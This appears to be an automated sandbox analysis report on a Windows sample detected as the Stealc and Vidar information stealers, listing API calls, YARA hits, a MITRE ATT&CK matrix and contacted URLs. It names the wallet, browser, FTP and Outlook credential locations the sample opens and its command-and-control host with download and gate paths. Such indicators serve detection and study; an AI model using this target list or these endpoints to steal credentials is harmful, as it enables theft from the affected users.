0_2_003A45C0

Source: C:\Users\user\Desktop\file.exe

0_2_003B9860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003B9750 mov eax, dword ptr fs:[00000030h]

0_2_003B9750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_003B7850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCCB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6CCCB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCCB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6CCCB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 1272, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_003B9600

Source: file.exe, file.exe, 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CCCB341 cpuid

0_2_6CCCB341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_003B7B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003B6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_003B6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_003B7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003B7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_003B7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1526931154.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1272, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 1272, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: Jaxx Desktop (old)
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe	String found in binary or memory: info.seco
Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json.*
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: multidoge.wallet
Source: file.exe	String found in binary or memory: seed.seco
Source: file.exe	String found in binary or memory: keystore
Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.3[

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1272, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1526931154.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1272, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 1272, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	45%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
http://185.215.113.37/	100%	Avira URL Cloud	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.phpkP	100%	Avira URL Cloud	malware
https://support.mozilla.org	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.phpX#	100%	Avira URL Cloud	malware
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.37.u	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpnfigOverlay	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dll6	100%	Avira URL Cloud	malware
http://185.215.113.37	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpainnet	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php%_	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpOP	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phprowser	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll2	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dllT	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dllept	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dllZ	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/Ebi)	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php;P	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpdll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phption:	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dlll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dllH	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpP	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phptrf_	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpirefox	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll~	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dllm	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dllz	100%	Avira URL Cloud	malware
http://185.215.113.37e2b1563c6670f193.phpox	0%	Avira URL Cloud	safe
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/mozglue.dll$	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpB_9)	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php24	100%	Avira URL Cloud	malware
http://185.215.113.37/1b	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpX#	file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpkP	file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll6	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpnfigOverlay	file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37.u	file.exe, 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php%_	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpainnet	file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpOP	file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phprowser	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllept	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllT	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll2	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/Ebi)	file.exe, 00000000.00000002.1753853572.0000000000F61000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dllZ	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5	BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php;P	file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dlll	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpdll	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1777766823.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllH	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpP	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phptrf_	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpirefox	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
